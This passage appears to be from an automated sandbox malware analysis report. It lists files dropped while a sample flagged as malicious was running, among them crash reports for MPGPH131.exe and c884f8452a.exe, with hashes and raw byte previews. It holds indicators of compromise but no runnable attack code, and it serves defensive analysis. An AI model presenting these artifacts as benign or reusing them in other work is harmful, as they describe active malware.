                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:neF1xn14/7RHK8MFoy7bh7bZzLhjDxdX4YgBAsU:+1xn1uhK8MFfB7dHhjdiYYAsU
                                                                                                                                                                                                                                      MD5:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      SHA1:45902F3469CCE67CD21F5904E87BD79A105C9DD5
                                                                                                                                                                                                                                      SHA-256:96A1AE1FA6F9AA36C26C2067939950D4567DEC2B2D7774F779AE199BE8B6BE16
                                                                                                                                                                                                                                      SHA-512:4BDAF2C82379B04A881660E05B121CAE79D300EA308C4D52304FF091F59800C9666630C35DAC247D37CB3478EC96D1388E04EC201AB067B2AD57FE6D4D10ACBA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.....t...t...t._.w...t._.q...t._.s...t.......t...p...t...w...t...q.O.t._.p...t._.r...t._.u...t...u.4.t..|}...t..|t...t..|....t......t..|v...t.Rich..t.........PE..L......f...............'.4...2........X......P....@.......................... X.......#...@.........................TMW.L...m........P.....................DMW..............................LW.............................t...@................... . .@.......>..................@....rsrc.......P.......N..............@....idata ............................@... ..).. ......................@...ejwyeyni.@....>..2..................@...zoeuqxwb......X.......#.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8e035783, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                      Entropy (8bit):0.6585568942777204
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                      MD5:E41C7683FE6C00EB1BD54BD0845BDE6D
                                                                                                                                                                                                                                      SHA1:961DDB52568A165F8D34CADD31D16A30133B5E10
                                                                                                                                                                                                                                      SHA-256:8FF38365FD6261B7D7C79E918926DEE5D52414D4721C3C9163BFC76E372499E7
                                                                                                                                                                                                                                      SHA-512:35B92F49BA9AFC34F20690A3641A3AE02CB623C1DB59D8714F4046DE00D0FEFA84BF44DF5B0A1A92BA3177C4F90798BB4C37B9C262E15926DD75A7AD09AA66E3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..W.... ...............X\...;...{......................0.z..........{.......|a.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.....................................s.....|..................MyP@.....|a..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MPGPH131.exe_e7f941c137a56bc35a442066886260e392eebb0_71691813_2d0c8636-0fc2-4001-88f0-874664e35bad\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.0727488327709886
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:1j8laq+zU83d/005DDP6E6jjL67Zr9qWJzuiFmZ24IO8d6t:OaUCds05DD2jwJzuiFmY4IO8q
                                                                                                                                                                                                                                      MD5:EF0071FC0C6C5FB79571B93C03C16BD8
                                                                                                                                                                                                                                      SHA1:CBF2C416256E03E10C9F2E7DFAB04AEBE144BEAD
                                                                                                                                                                                                                                      SHA-256:288B5550C7A0182ED60ACEB8A932FF932E5B5BE19E3155DFC473866875A1746D
                                                                                                                                                                                                                                      SHA-512:67BA0EA556FCDE9977686EF3CD84B0188B8DA6A7B18FFC66FD3A509C5C1C093502704BCDE1BC3B66E5F42ADE85C455D1BE05E5C03E7B40022B5B5EA91F359C32
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.9.6.3.7.8.2.4.1.4.1.8.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.9.6.3.7.8.3.1.5.0.1.9.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.0.c.8.6.3.6.-.0.f.c.2.-.4.0.0.1.-.8.8.f.0.-.8.7.4.6.6.4.e.3.5.b.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.0.6.c.d.6.e.-.1.c.b.b.-.4.4.d.b.-.8.7.2.b.-.6.e.1.5.2.0.6.e.d.e.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.P.G.P.H.1.3.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.w.p.a...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.a.c.-.0.0.0.1.-.0.0.1.4.-.7.f.8.b.-.8.c.0.2.f.9.9.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.3.f.8.9.e.b.f.a.e.e.9.5.3.f.9.e.3.a.f.4.1.a.f.b.b.f.2.6.5.b.b.0.0.0.0.0.9.0.4.!.0.0.0.0.4.5.9.0.2.f.3.4.6.9.c.c.e.6.7.c.d.2.1.f.5.9.0.4.e.8.7.b.d.7.9.a.1.0.5.c.9.d.d.5.!.M.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MPGPH131.exe_e7f941c137a56bc35a442066886260e392eebb0_71691813_7c03d346-bca5-4ef7-ba13-0d329aabc53b\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.066097890821137
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:TwVl6q+z283d/005DDP6E6jjbdnZrxLZOzuiFmZ24IO8d6t:Mf62Cds05DD2jXOzuiFmY4IO8q
                                                                                                                                                                                                                                      MD5:ACD23DC53CDE78D410336A814F0A455A
                                                                                                                                                                                                                                      SHA1:15357AACFB2056AC09F87ADF48EC1708C7627920
                                                                                                                                                                                                                                      SHA-256:95C7B3A3E60720C8DF69D82B6A57191CA3483E6249C060585E84D4C4C21A250E
                                                                                                                                                                                                                                      SHA-512:E9B4485CA4D83A06ECD244D6C68C9B7B44BB4F3606C77EB686ECC23864BCB54C6E8FE88E30194B017D8E1C7B9FA3E03E610571E61F4396BF0F5230150F47AF42
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.9.6.3.7.8.3.2.1.8.9.1.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.9.6.3.7.8.3.8.8.7.5.5.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.0.3.d.3.4.6.-.b.c.a.5.-.4.e.f.7.-.b.a.1.3.-.0.d.3.2.9.a.a.b.c.5.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.c.f.7.6.d.8.-.4.9.0.5.-.4.d.a.1.-.a.4.8.a.-.9.3.8.2.1.f.2.e.e.b.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.P.G.P.H.1.3.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.w.p.a...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.6.c.-.0.0.0.1.-.0.0.1.4.-.2.a.5.3.-.a.1.0.2.f.9.9.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.3.f.8.9.e.b.f.a.e.e.9.5.3.f.9.e.3.a.f.4.1.a.f.b.b.f.2.6.5.b.b.0.0.0.0.0.9.0.4.!.0.0.0.0.4.5.9.0.2.f.3.4.6.9.c.c.e.6.7.c.d.2.1.f.5.9.0.4.e.8.7.b.d.7.9.a.1.0.5.c.9.d.d.5.!.M.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c884f8452a.exe_cb7c7044b12ad4d5eac6ccbe687b5b5249d82ef_d12a3eaf_f8b9a4f9-955c-458d-a5da-73d12567bae0\Report.wer

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.082373971605741
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:kfBSgpaa3/s20/BC40IjL67Zr96nIzuiFmZ24IO8cE:rQ3Ud/BCEjJIzuiFmY4IO8d
                                                                                                                                                                                                                                      MD5:772644EE1E22A1D3A602AC993D1FCCA4
                                                                                                                                                                                                                                      SHA1:0394FC1F49FAECDDDBC87FA3C59E5C9092C11F2D
                                                                                                                                                                                                                                      SHA-256:DA0A1D9B35F17CB9D254AFA7D508DBB9C3B0B7DC5CCACC2DC4D6B98DDF41C9BB
                                                                                                                                                                                                                                      SHA-512:348A62AAED88A035CF397ABBC210D4CD4ECB9C9958F92BA06308DC6CD30D4332573EEE1945C703E1867F6273D84E5DC869B066F40A2DDB9636A014BA8383245D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.9.6.3.7.7.6.5.6.0.8.8.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.9.6.3.7.7.7.6.6.0.1.7.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.b.9.a.4.f.9.-.9.5.5.c.-.4.5.8.d.-.a.5.d.a.-.7.3.d.1.2.5.6.7.b.a.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.5.f.9.f.5.8.-.8.3.7.7.-.4.7.9.1.-.9.d.0.8.-.3.1.d.0.d.2.4.5.4.1.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.8.8.4.f.8.4.5.2.a...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.w.p.a...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.d.c.-.0.0.0.1.-.0.0.1.4.-.8.5.5.6.-.5.4.0.0.f.9.9.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.3.f.8.9.e.b.f.a.e.e.9.5.3.f.9.e.3.a.f.4.1.a.f.b.b.f.2.6.5.b.b.0.0.0.0.0.9.0.4.!.0.0.0.0.4.5.9.0.2.f.3.4.6.9.c.c.e.6.7.c.d.2.1.f.5.9.0.4.e.8.7.b.d.7.9.a.1.0.5.c.9.d.d.5.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E2.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 19 01:29:42 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):264092
                                                                                                                                                                                                                                      Entropy (8bit):1.4863952950372878
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:FF8biQW/VuW5vv5fxukkg/YMwf0CLEm2:F0G/VhH5peOgLv2
                                                                                                                                                                                                                                      MD5:C61D022BE478E360B5607B58735EE4AE
                                                                                                                                                                                                                                      SHA1:4643BF68A12F45A59D1F3E7CB3226842865091E5
                                                                                                                                                                                                                                      SHA-256:D42A5DAB6CA32518181025C0706DA405A1224616C60CF5F9D87E5A18BE0179FB
                                                                                                                                                                                                                                      SHA-512:684A6BE3F408429E9EE408DAAA69251326C6031E08AF1DF72DECF8C0F16DF59AAEEE0D7CAA2E8485A51F930ECDA27AD38BFDF37A2D3DD1DA21FD607B121EDD3A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MDMP..a..... .........!f............d...........p...x.......l....(......................`.......8...........T............Q..............T)..........@+..............................................................................eJ.......+......GenuineIntel............T.............!f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER60C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6358
                                                                                                                                                                                                                                      Entropy (8bit):3.7290027711910176
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJ+un6zYiZFJjmR8prP89b2Psf4Sm:R6lXJX6zY6FJjmP20fc
                                                                                                                                                                                                                                      MD5:F86338A08F8EECA3C7E49052669FF89B
                                                                                                                                                                                                                                      SHA1:5BED5569AA3B1CADE11B0261A88CB5BCC1E5EA4B
                                                                                                                                                                                                                                      SHA-256:38F5685864B4C610A028A457F573C5504E73FEB0E5C85C4EDA5FB2384F8757B2
                                                                                                                                                                                                                                      SHA-512:993AA410BE86B82292DC20F516AFC32F8C6E2D5B25342C4A3EB99E97F7073691C14D03E45E8F7372E6ABDE3D759BA9939B4D928A2B44C835BA01BFC7F63D49E9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.1.2.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER63C.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4690
                                                                                                                                                                                                                                      Entropy (8bit):4.512732406719088
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsuJg77aI9VyWpW8VYTYm8M4JBLF9j+q8cz5DmbDCkvsJd:uIjfkI7bT7VDJ9jb5DmbDCdJd
                                                                                                                                                                                                                                      MD5:31751BB67D89613E8C2E17EC52D3867B
                                                                                                                                                                                                                                      SHA1:BC5953A38DB732F36639DD52886E2FCBD1762BD9
                                                                                                                                                                                                                                      SHA-256:82EF089CDDDC1E350BC77795BE18F5F9F585232563AA52DFA26092F63F06E197
                                                                                                                                                                                                                                      SHA-512:BBD24B02A853825CFC993A143DB721DD399995DF91872A719CE184113D7EDFCCCD0645AE34F457DCF16CCCAFA30DE0804E276CE1B4B1ECACCB093BDE7C351B42
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="286112" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7FF.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 19 01:29:43 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):254816
                                                                                                                                                                                                                                      Entropy (8bit):1.4894529367935254
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ScwlDEhK5vkTKjNiX9B4ZeqxMnHGDqSHkMDs:ScwNb8me9V8HX
                                                                                                                                                                                                                                      MD5:AEE60E775C99BB4B6F40F87D39866F18
                                                                                                                                                                                                                                      SHA1:D02FD24825B08483005E3C7F6C78F70C4730B31F
                                                                                                                                                                                                                                      SHA-256:0D2FBE26E8880755AE91960998795CAA42CE552BF103E888677E09C5151E7B60
                                                                                                                                                                                                                                      SHA-512:77FE8FA59102E5C772183837F1B0F8577B7E87FAF70FF78A42D676EE7A37B39067EC5AC2C4D6227BFE7517F0D0498960E4EE8301718C962127D9E18FEB89E613
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MDMP..a..... .........!f............4...............H.......l...L(..........$...........`.......8...........T............O..x............(...........*..............................................................................eJ......<+......GenuineIntel............T.......l.....!f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER938.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6358
                                                                                                                                                                                                                                      Entropy (8bit):3.729585051451638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJLuA6EjXYiZFJjmR8pr/89b/gsfCVm:R6lXJt6EjXY6FJjm//zfJ
                                                                                                                                                                                                                                      MD5:D3627EB2DC6C3B88DF4CE27B87B7DA46
                                                                                                                                                                                                                                      SHA1:3FDAC4CFDAE12DB90DB80E35ECC2F6222BBCE066
                                                                                                                                                                                                                                      SHA-256:DC65FA7A40339E8E3C51C9937E90FFDD93E09125E6A36A5E9952B7ECD9770EB1
                                                                                                                                                                                                                                      SHA-512:DA4B820008D3BFBAABFAB9F70D43758BCED1105DFEEED008711C86C6BFD05E8804A9A2EA8317920587239AF817358501154C4A03EFC5CB67EC24C11390F59902
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.3.6.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER968.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4690
                                                                                                                                                                                                                                      Entropy (8bit):4.511842143439859
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsuJg77aI9VyWpW8VYNYm8M4JBLF2hm+q8cH5DmbDCkvsZd:uIjfkI7bT7V9Jzv5DmbDCdZd
                                                                                                                                                                                                                                      MD5:F89B4F017D0BFB1B6ECACB3E7C4D68F6
                                                                                                                                                                                                                                      SHA1:19AE9B439DBA46CDD860F4F453580B35115D8FA5
                                                                                                                                                                                                                                      SHA-256:87BA71E43ECA1F7629E70BCB9AD6E6E7CD6502BFA40EF5A0315117D4A5A51250
                                                                                                                                                                                                                                      SHA-512:7E796158B71FD385635175C2F9110B1766493BD8F2D0DAF5E06F46F5417080517826777E017B2D7A2EC1CE4C147649F61F7CB6B1319FFF95C1383A14F73FDEB0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="286112" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE0E.tmp.dmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 19 01:29:36 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):266884
                                                                                                                                                                                                                                      Entropy (8bit):1.4889833278100257
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:T12XNVW5vvOq101AllmmaiCCHQ7jztajt5ZCU2iaNrYG5vv:xc8nOq106517wvYDJ2iQZv
                                                                                                                                                                                                                                      MD5:C3A1D4200E5269989E303E3F46089F3F
                                                                                                                                                                                                                                      SHA1:B3D40A540F614E123069741CB47DAFA7966D97C0
                                                                                                                                                                                                                                      SHA-256:4D4AF580794844CFE58F70ED7A90F65F64E3EE9B859653137E346C721093A4B9
                                                                                                                                                                                                                                      SHA-512:4547AEB383FCB7471E81A04FAF1B4DE59802BE7242A41939AC5618FFC665036F15D0D51C36EBCA2FAC98B5A42D41ACFEDCD75D6152A7105DEA2D9FE06C0385E6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
